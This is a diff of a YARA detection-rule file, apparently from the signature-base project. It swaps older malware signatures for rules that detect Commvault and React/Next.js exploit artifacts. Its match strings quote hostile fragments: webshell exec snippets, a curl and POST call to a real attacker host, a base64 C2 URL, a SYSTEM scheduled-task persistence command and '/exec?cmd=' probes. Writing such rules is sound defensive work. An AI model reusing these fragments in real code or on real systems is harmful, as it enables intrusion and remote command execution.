-		$s5 = "\",Start" fullword wide
+		$x1 = "\\Release\\Dustman.pdb" ascii
+		$x2 = "/c agent.exe A" fullword ascii
+		$s1 = "C:\\windows\\system32\\cmd.exe" fullword ascii
+		$s2 = "The Magic Word!" fullword ascii
+		$s3 = "Software\\Oracle\\VirtualBox" fullword wide
+		$s4 = "\\assistant.sys" wide
+		$s5 = "Down With Bin Salman" fullword wide
+		$sc1 = { 00 5C 00 5C 00 2E 00 5C 00 25 00 73 }
+		$op1 = { 49 81 c6 ff ff ff 7f 4c 89 b4 24 98 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 3000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Qqbrowser : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Commvault_CVE_2025_57791_Aug25_1 : FILE
 {
 	meta:
-		description = "Not malware but suspicious browser - file QQBrowser.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "457507c5-0411-5d72-891b-ae3e428ea2d6"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L53-L70"
+		description = "Detects potential exploit for WT-2025-0050, authentication bypass through QCommand argument injection"
+		author = "X__Junior"
+		id = "b8882dcf-3b62-5b82-95ea-1953353b43ec"
+		date = "2025-08-21"
+		modified = "2025-08-21"
+		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "525d134f57aaa314bcf0676678264e518edb785970478cb31a8fb6f1c8c92263"
-		score = 50
-		quality = 83
+		logic_hash = "d5c6815a5ca3b03ef8f76ed7b378800012c763f90fcba2187bb07d81ce01d832"
+		score = 60
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "adcf6b8aa633286cd3a2ce7c79befab207802dec0e705ed3c74c043dabfc604c"
 
 	strings:
-		$s1 = "TerminateProcessWithoutDump" fullword ascii
-		$s2 = ".Downloader.dll" fullword wide
-		$s3 = "Software\\Chromium\\BrowserCrashDumpAttempts" fullword wide
-		$s4 = "QQBrowser_Broker.exe" fullword wide
+		$sa1 = "_localadmin__"
+		$sa2 = "-localadmin"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		not uint16( 0 ) == 0x5a4d and filesize < 20MB and all of them
 }
-rule SIGNATURE_BASE_Chrome_Elf : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Commvault_CVE_2025_57791_Aug25_2 : FILE
 {
 	meta:
-		description = "Detects Fireball malware - file chrome_elf.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8680d5b5-e26f-5a3f-aeab-b965afe91027"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L72-L90"
+		description = "Detects potential exploit for WT-2025-0050, authentication bypass through QCommand argument injection"
+		author = "X__Junior"
+		id = "0a47c475-4ff4-5230-a9a6-49ee2b5aaf86"
+		date = "2025-08-21"
+		modified = "2025-08-21"
+		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L16-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "89f0ab16f164222ecf2a4b14bee02d0c24517d03d1c12b25f5158eebc31b3e3d"
-		score = 75
+		logic_hash = "61e3ddc09157badb2a1abf30da2cc35cac1a723db1134a37cb667be78209b845"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e4d4f6fbfbbbf3904ca45d296dc565138a17484c54aebbb00ba9d57f80dfe7e5"
 
 	strings:
-		$x2 = "schtasks /Create /SC HOURLY /MO %d /ST 00:%02d:00 /TN \"%s\" /TR \"%s\" /RU \"SYSTEM\"" fullword wide
-		$s6 = "aHR0cDovL2R2Mm0xdXVtbnNndHUuY2xvdWRmcm9udC5uZXQvdjQvZ3RnLyVzP2FjdGlvbj12aXNpdC5jaGVsZi5pbnN0YWxs" fullword ascii
-		$s7 = "QueryInterface call failed for IExecAction: %x" fullword ascii
-		$s10 = "%s %s,Rundll32_Do %s" fullword wide
-		$s13 = "Failed to create an instance of ITaskService: %x" fullword ascii
-		$s16 = "Rundll32_Do" fullword ascii
+		$sa1 = "_localadmin__"
+		$sa2 = "-localadmin" base64
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
+		filesize < 20MB and all of them
 }
-rule SIGNATURE_BASE_Fireball_Regkey : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Commvault_CVE_2025_57791_Artifact_Aug25 : FILE
 {
 	meta:
-		description = "Detects Fireball malware - file regkey.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6e22bb93-8c8b-510f-a9e4-6e57c392c2ae"
-		date = "2017-06-02"
-		modified = "2022-12-21"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L92-L108"
+		description = "Detects exploit artifact for WT-2025-0050, authentication bypass through QCommand argument injection"
+		author = "X__Junior"
+		id = "91f3d726-e856-54f1-846f-8b83e09dd53c"
+		date = "2025-08-21"
+		modified = "2025-08-21"
+		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L30-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f8fe8b1edb009ac84acf6159feada91d364507c53a9f92abd6b245b38fa058f5"
+		logic_hash = "7a3f57509dc7e986fd6d00204deb5baec815e04e0e140a7751bab8ce18e8da62"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fff2818caa9040486a634896f329b8aebaec9121bdf9982841f0646763a1686b"
 
 	strings:
-		$s1 = "\\WinMain\\Release\\WinMain.pdb" ascii
-		$s2 = "ScreenShot" fullword wide
-		$s3 = "WINMAIN" fullword wide
+		$sa1 = "_localadmin__"
+		$sa2 = /-cs [a-zA-Z0-9-{}]{3,32} -cs /
+		$sb2 = "-localadmin" base64
+		$sb1 = "-localadmin"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		filesize < 20MB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_Fireball_Winsap : FILE
+rule SIGNATURE_BASE_EXPL_JSP_Commvault_CVE_2025_57791_Aug25_1 : FILE
 {
 	meta:
-		description = "Detects Fireball malware - file winsap.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e68e7738-f325-5b73-9e61-4e2413b7b7be"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L110-L128"
+		description = "Detects potential exploit for WT-2025-0049, Post-Auth RCE with QCommand Path Traversal"
+		author = "X__Junior"
+		id = "73b1bab0-1206-55b3-a6cf-51742a9ce67f"
+		date = "2025-08-21"
+		modified = "2025-08-21"
+		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L47-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "de722d90d82f82faa5dfe5991c846e5c16deb919ae653b8f9fe4d1ad0384c41d"
+		logic_hash = "359b35ced874244901f64bc09456cfec7079421ef6bab58ea95a3b1887ecc858"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7244d139ef9ea431a5b9cc6a2176a6a9908710892c74e215431b99cd5228359"
 
 	strings:
-		$s1 = "aHR0cDovL2" ascii
-		$s2 = "%s\\svchost.exe -k %s" fullword wide
-		$s3 = "\\SETUP.dll" wide
-		$s4 = "WinSAP.dll" fullword ascii
-		$s5 = "Error %u in WinHttpQueryDataAvailable." fullword ascii
-		$s6 = "UPDATE OVERWRITE" fullword wide
+		$s1 = "<App_GetUserPropertiesResponse>" ascii
+		$s2 = "getMethod('getRuntime').invoke(null).exec(param.cmd)" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Fireball_Archer : FILE
+rule SIGNATURE_BASE_EXPL_JSP_Commvault_CVE_2025_57791_Aug25_2 : FILE
 {
 	meta:
-		description = "Detects Fireball malware - file archer.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "16bb95c1-af69-5688-8999-f097d02d2ffc"
-		date = "2017-06-02"
-		modified = "2022-12-21"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L130-L149"
+		description = "Detects potential exploit for WT-2025-0049, Post-Auth RCE with QCommand Path Traversal"
+		author = "X__Junior"
+		id = "facbe0e9-6fe6-5d90-87bc-2696f471dcb5"
+		date = "2025-08-21"
+		modified = "2025-08-21"
+		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L61-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f566ba477ccf1325914b6c9785e2b85f732b211e9321eea24d6c5a0339ccc4d1"
+		logic_hash = "3375a33556a9b479f0c170de6e06c80ab0277f1356e4ac44bfe51d6a65a578fe"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022"
 
 	strings:
-		$x1 = "\\archer_lyl\\Release\\Archer_Input.pdb" ascii
-		$s1 = "Archer_Input.dll" fullword ascii
-		$s2 = "InstallArcherSvc" fullword ascii
-		$s3 = "%s_%08X" fullword wide
-		$s4 = "d\\\\.\\PhysicalDrive%d" fullword wide
+		$s1 = "<App_UpdateUserPropertiesRequest>" ascii
+		$s2 = "<description>" ascii
+		$s3 = "getMethod('getRuntime').invoke(null).exec(param.cmd)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $x1 or 3 of them )
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Clearlog : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Commvault_CVE_2025_57791_Indicator_Shell_Drop_Aug25
 {
 	meta:
-		description = "Detects Fireball malware - file clearlog.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3eb58a7a-b04d-52c2-8c3c-c149da8d4aa8"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L151-L171"
+		description = "Detects suspicious log lines that indicate web shell drops into the Apache root folder of a Commvault installation"
+		author = "Florian Roth"
+		id = "1c4e9992-79de-557e-ace6-3d6916023359"
+		date = "2025-08-21"
+		modified = "2025-08-21"
+		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L76-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b6fd74ad184cafa7885385f808034e9211ff37e04ed5e8ea4af2c7fb7d697bd"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3"
+		logic_hash = "f0e9fedba803b0cd8b1469bad7a50bf4647f7e2f786520caf5a79ac626879125"
+		score = 70
+		quality = 60
+		tags = ""
 
 	strings:
-		$x1 = "\\ClearLog\\Release\\logC.pdb" ascii
-		$s1 = "C:\\Windows\\System32\\cmd.exe /c \"\"" fullword wide
-		$s2 = "logC.dll" fullword ascii
-		$s3 = "hhhhh.exe" fullword wide
-		$s4 = "ttttt.exe" fullword wide
-		$s5 = "Logger Name:" fullword ascii
-		$s6 = "cle.log.1" fullword wide
+		$xr1 = /Results written to \[[C-Z]:\\Program Files\\Commvault\\ContentStore\\Apache\\webapps\\ROOT\\[^\\]{1,20}\.jsp\]/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 or 2 of them )
+		$xr1
 }
-rule SIGNATURE_BASE_Fireball_Gubed : FILE
+rule SIGNATURE_BASE_MAL_Github_Repo_Compromise_Myjino_Ru_Aug22
 {
 	meta:
-		description = "Detects Fireball malware - file gubed.exe"
+		description = "Detects URL mentioned in report on compromised Github repositories in August 2022"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cba2913f-4d9a-5925-ad9a-f5815a635291"
-		date = "2017-06-02"
-		modified = "2022-12-21"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L173-L191"
+		id = "1eaabad5-d0de-5d17-a5fa-3c638354843d"
+		date = "2022-08-03"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/stephenlacy/status/1554697077430505473"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_repo_compromise_myjino_ru.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e8053d8a95d41d81940bbaf7945323849613dbcfe727559a07bc294bd834b65f"
-		score = 75
+		logic_hash = "5cbe6ee46a68d89b1e772762e29baa907458235cd014f20a0d0932e95c046f19"
+		score = 90
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e3f69a1fb6fcaf9fd93386b6ba1d86731cd9e5648f7cff5242763188129cd158"
+		tags = ""
 
 	strings:
-		$x1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MRT.exe" fullword wide
-		$x2 = "tIphlpapi.dll" fullword wide
-		$x3 = "http://%s/provide?clients=%s&reqs=visit.startload" fullword wide
-		$x4 = "\\Gubed\\Release\\Gubed.pdb" ascii
-		$x5 = "d2hrpnfyb3wv3k.cloudfront.net" fullword wide
+		$x1 = "curl http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
+		$x2 = "http__.Post(\"http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_APT17_Malware_Oct17_1 : FILE
+rule SIGNATURE_BASE_EXPL_React_Server_CVE_2025_55182_POC_Dec25 : CVE_2025_55182
 {
 	meta:
-		description = "Detects APT17 malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "457312d8-5bfe-5282-9ace-2f169278569c"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L13-L29"
+		description = "Detects in-memory webshell indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182)"
+		author = "Florian Roth"
+		id = "6ce94e2d-64bf-5b1c-8f9a-1a22470cad76"
+		date = "2025-12-05"
+		modified = "2025-12-12"
+		reference = "https://x.com/pyn3rd/status/1996840827897954542/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c4391b47df0c40dbd605515992e5eaa758d0e509e9ad24b517d104b8e7d504c"
-		score = 75
+		logic_hash = "a4f27fc85807e8f94e6947523a09d87ceed0658334756a9724322181c3eecd20"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83"
+		tags = "CVE-2025-55182"
 
 	strings:
-		$s1 = "\\spool\\prtprocs\\w32x86\\localspl.dll" ascii
-		$s2 = "\\spool\\prtprocs\\x64\\localspl.dll" ascii
-		$s3 = "\\msvcrt.dll" ascii
-		$s4 = "\\TSMSISrv.dll" ascii
+		$xs1 = "{const cmd=p.query.cmd;if(!cmd)(s.writeHead(400);"
+		$s1 = ";if(p.pathname=="
+		$s2 = ".writeHead(400);"
+		$s3 = ".writeHead(200,{'Content-Type':"
+		$s4 = ".execSync("
+		$s5 = ",stdio:'pipe'})"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		1 of ( $x* ) or all of ( $s* )
 }
-
-rule SIGNATURE_BASE_APT17_Malware_Oct17_2 : FILE
+rule SIGNATURE_BASE_SUSP_WEBSHELL_LOG_Signatures_Dec25 : FILE
 {
 	meta:
-		description = "Detects APT17 malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f21514a-168b-5158-8322-60fa8499b11a"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L31-L59"
+		description = "Detects indicators related simple webshells that use the same exec/cmd pattern"
+		author = "Florian Roth"
+		id = "ac589f51-dfec-5bac-a402-0f304bcb9422"
+		date = "2025-12-05"
+		modified = "2025-12-12"
+		reference = "https://x.com/pyn3rd/status/1996840827897954542/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L21-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "378a21edeaf36267986bd5158fe736b0970b0b9f0ad824f09dc6434a9ba1d7e2"
-		score = 75
+		logic_hash = "d9bc32a48e37708928a658d171f6cac7c363b346d201e7aed17c8cbe48bab115"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "20cd49fd0f244944a8f5ba1d7656af3026e67d170133c1b3546c8b2de38d4f27"
 
 	strings:
-		$x1 = "Cookie: __xsptplus=%s" fullword ascii
-		$x2 = "http://services.fiveemotions.co.jp" fullword ascii
-		$x3 = "http://%s/ja-JP/2015/%d/%d/%d%d%d%d%d%d%d%d.gif" fullword ascii
-		$s1 = "FoxHTTPClient_EXE_x86.exe" fullword ascii
-		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3072" ascii
-		$s3 = "hWritePipe2 Error:%d" fullword ascii
-		$s4 = "Not Support This Function!" fullword ascii
-		$s5 = "Global\\PnP_No_Management" fullword ascii
-		$s6 = "Content-Type: image/x-png" fullword ascii
-		$s7 = "Accept-Language: ja-JP" fullword ascii
-		$s8 = "IISCMD Error:%d" fullword ascii
+		$xa1 = "/exec?cmd=ls"
+		$xa2 = "/exec?cmd=whoami"
+		$xa3 = "/exec?cmd=id"
+		$xa4 = "/exec?cmd=uname%20-a"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.exports ( "_foo@0" ) or 1 of ( $x* ) or 6 of them )
+		1 of them and not uint16( 0 ) == 0x3c3f
 }
-
-rule SIGNATURE_BASE_APT17_Unsigned_Symantec_Binary_EFA : FILE
+rule SIGNATURE_BASE_EXPL_RCE_React_Server_CVE_2025_55182_POC_Dec25 : CVE_2025_55182 FILE
 {
 	meta:
-		description = "Detects APT17 malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "56eec517-8b00-5cb5-9806-249e50f53b99"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L61-L75"
+		description = "Detects RCE indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182)"
+		author = "Florian Roth"
+		id = "4e876c1c-41cc-57aa-9fe2-652f3a1e3ef2"
+		date = "2025-12-05"
+		modified = "2025-12-12"
+		reference = "https://www.youtube.com/watch?v=MmdwakT-Ve8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L39-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7306c8ae2be4dbf56957e11d78ba85bcfa1c8570ba41f749ea5b0e2a05e9df7b"
-		score = 75
+		logic_hash = "54854f6cf3d1f4f30fb6de8312a5969bd5bc0d8c7a047a9f0ef195551c1dc2c6"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f"
+		tags = "CVE-2025-55182, FILE"
 
 	strings:
-		$s1 = "Copyright (c) 2007 - 2011 Symantec Corporation" fullword wide
-		$s2 = "\\\\.\\SYMEFA" fullword wide
+		$s1 = "process.mainModule.require('child_process').execSync("
+		$s2 = "$1:constructor:constructor"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.number_of_signatures == 0 )
+		all of them and not uint16( 0 ) == 0x3c3f
 }
-
-rule SIGNATURE_BASE_APT17_Malware_Oct17_Gen : FILE
+rule SIGNATURE_BASE_EXPL_RCE_React_Server_Next_JS_CVE_2025_66478_Tracebacks_Dec25 : CVE_2025_55182 CVE_2025_66478
 {
 	meta:
-		description = "Detects APT17 malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c2156e68-d5b5-5bd7-858c-2d5e90199287"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L77-L107"
+		description = "Detects traceback indicators caused by the exploitation of the React Server Remote Code Execution Vulnerability (CVE-2025-55182) in Next.js applications (CVE-2025-66478). This can also be caused by vulnerability scanning."
+		author = "Florian Roth"
+		id = "b13f1f50-9ac9-5fe0-95d1-f075ac90cb62"
+		date = "2025-12-05"
+		modified = "2025-12-12"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L55-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3e0e4a989a907f5f1aaac4ba43611dd0d2e4b4fd340234f04b3fce25843f9dc6"
-		score = 75
+		logic_hash = "668316531c7c87248acdd450e6ced2247ed0252f395754cb2d7370f748c30944"
+		score = 55
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2"
-		hash2 = "07f93e49c7015b68e2542fc591ad2b4a1bc01349f79d48db67c53938ad4b525d"
-		hash3 = "ee362a8161bd442073775363bf5fa1305abac2ce39b903d63df0d7121ba60550"
+		tags = "CVE-2025-55182, CVE-2025-66478"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)" fullword ascii
-		$x2 = "http://%s/imgres?q=A380&hl=en-US&sa=X&biw=1440&bih=809&tbm=isus&tbnid=aLW4-J8Q1lmYBM" ascii
-		$s1 = "hWritePipe2 Error:%d" fullword ascii
-		$s2 = "Not Support This Function!" fullword ascii
-		$s3 = "Cookie: SESSIONID=%s" fullword ascii
-		$s4 = "http://0.0.0.0/1" fullword ascii
-		$s5 = "Content-Type: image/x-png" fullword ascii
-		$s6 = "Accept-Language: en-US" fullword ascii
-		$s7 = "IISCMD Error:%d" fullword ascii
-		$s8 = "[IISEND=0x%08X][Recv:] 0x%08X %s" fullword ascii
+		$s1 = "Unexpected end of form"
+		$s2 = "/next-server/app-page.runtime.dev.js:2:457"
+		$s3 = "/app-page.runtime.dev.js:2:472"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "414bbd566b700ea021cfae3ad8f4d9b9" or 1 of ( $x* ) or 6 of them ) )
+		all of them
 }
-rule SIGNATURE_BASE_Suspicious_Autoit_By_Microsoft : FILE
+rule SIGNATURE_BASE_EXPL_RCE_React_Server_Next_JS_CVE_2025_66478_Errors_Dec25 : CVE_2025_55182 CVE_2025_66478
 {
 	meta:
-		description = "Detects a AutoIt script with Microsoft identification"
-		author = "Florian Roth (Nextron Systems)"
-		id = "69b1c93d-ab12-5fdc-b6eb-fb135796d3a9"
-		date = "2017-12-14"
-		modified = "2025-08-13"
-		reference = "Internal Research - VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L381-L396"
+		description = "Detects error messages caused by the exploitation of the React Server Remote Code Execution Vulnerability (CVE-2025-55182) in Next.js applications (CVE-2025-66478). This can also be caused by vulnerability scanning."
+		author = "Florian Roth"
+		id = "6f0e572d-8598-51e0-8197-09a6ea930b81"
+		date = "2025-12-05"
+		modified = "2025-12-12"
+		reference = "https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L70-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7dfbaf7d136bd9e151c533b49394a9a596450d9cc2643dc144cb693290004591"
-		score = 60
+		logic_hash = "6e5d809cd436935324ad4cb657a66a1c257df13a8dd52ee5db1b803ad24560b3"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c0cbcc598d4e8b501aa0bd92115b4c68ccda0993ca0c6ce19edd2e04416b6213"
+		tags = "CVE-2025-55182, CVE-2025-66478"
 
 	strings:
-		$s1 = "Microsoft Corporation. All rights reserved" fullword wide
-		$s2 = "AutoIt" fullword ascii
+		$s1 = "[Error: NEXT_REDIRECT]"
+		$s2 = "digest: 'uid=0(root) gid=0(root)"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Size_Of_ASUS_Tuningtool : FILE
+rule SIGNATURE_BASE_EXPL_SUSP_JS_POC_Dec25 : CVE_2025_55182 FILE
 {
 	meta:
